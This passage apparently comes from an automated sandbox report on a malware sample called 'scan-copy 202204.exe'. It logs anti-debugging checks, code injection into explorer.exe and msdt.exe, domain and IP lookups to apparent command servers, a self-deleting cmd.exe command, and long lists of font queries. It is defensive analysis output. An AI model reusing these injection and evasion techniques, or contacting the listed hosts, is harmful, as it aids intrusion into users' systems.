            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D50050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D50050 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E01074 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DF2073 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB7016 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E04015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E04015 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6002D mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4B02A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B1E1 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DC41E8 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62990 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6A185 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5C182 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB51BE mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D661A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D661A0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DB69A6 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D5B944 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3B171 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3C962 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39100 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6513A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D54120 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62ACB mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D62AE4 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6D294 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D4AAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D6FAB0 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D352A5 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04E08A62 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DFEA55 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DC4257 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D39240 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D7927A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DEB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04DEB260 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D35210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D35210 mov ecx, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D35210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D35210 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\msdt.exeCode function: 18_2_04D3AA16 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess queried: DebugPort
            Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPort
            Source: C:\Users\user\Desktop\scan-copy 202204.exeCode function: 15_2_00409B50 LdrLoadDll,
            Source: C:\Users\user\Desktop\scan-copy 202204.exeMemory allocated: page read and write | page guard

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\explorer.exeDomain query: www.eco-friendly.one
            Source: C:\Windows\explorer.exeNetwork Connect: 198.54.114.195 80
            Source: C:\Windows\explorer.exeDomain query: www.brickstoneinvestmentltd.com
            Source: C:\Users\user\Desktop\scan-copy 202204.exeSection unmapped: C:\Windows\SysWOW64\msdt.exe base address: 13E0000
            Source: C:\Users\user\Desktop\scan-copy 202204.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\scan-copy 202204.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\scan-copy 202204.exeSection loaded: unknown target: C:\Windows\SysWOW64\msdt.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
            Source: C:\Windows\SysWOW64\msdt.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
            Source: C:\Users\user\Desktop\scan-copy 202204.exeMemory written: C:\Users\user\Desktop\scan-copy 202204.exe base: 400000 value starts with: 4D5A
            Source: C:\Users\user\Desktop\scan-copy 202204.exeThread APC queued: target process: C:\Windows\explorer.exe
            Source: C:\Users\user\Desktop\scan-copy 202204.exeThread register set: target process: 3968
            Source: C:\Windows\SysWOW64\msdt.exeThread register set: target process: 3968
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c timeout 10
            Source: C:\Users\user\Desktop\scan-copy 202204.exeProcess created: C:\Users\user\Desktop\scan-copy 202204.exe C:\Users\user\Desktop\scan-copy 202204.exe
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout 10
            Source: C:\Windows\SysWOW64\msdt.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\scan-copy 202204.exe"
            Source: explorer.exe, 00000010.00000000.386410813.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.350617281.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ProgmanEXE^
            Source: explorer.exe, 00000010.00000000.390581083.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.394754233.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.350841602.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
            Source: explorer.exe, 00000010.00000000.350841602.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.369057913.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.386834725.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
            Source: explorer.exe, 00000010.00000000.350841602.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.369057913.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.386834725.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
            Source: explorer.exe, 00000010.00000000.368703357.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.350632688.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000010.00000000.386457348.000000000069D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd4
            Source: explorer.exe, 00000010.00000000.350841602.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.369057913.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000010.00000000.386834725.0000000000BE0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: WProgram Manager
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Users\user\Desktop\scan-copy 202204.exe VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\scan-copy 202204.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
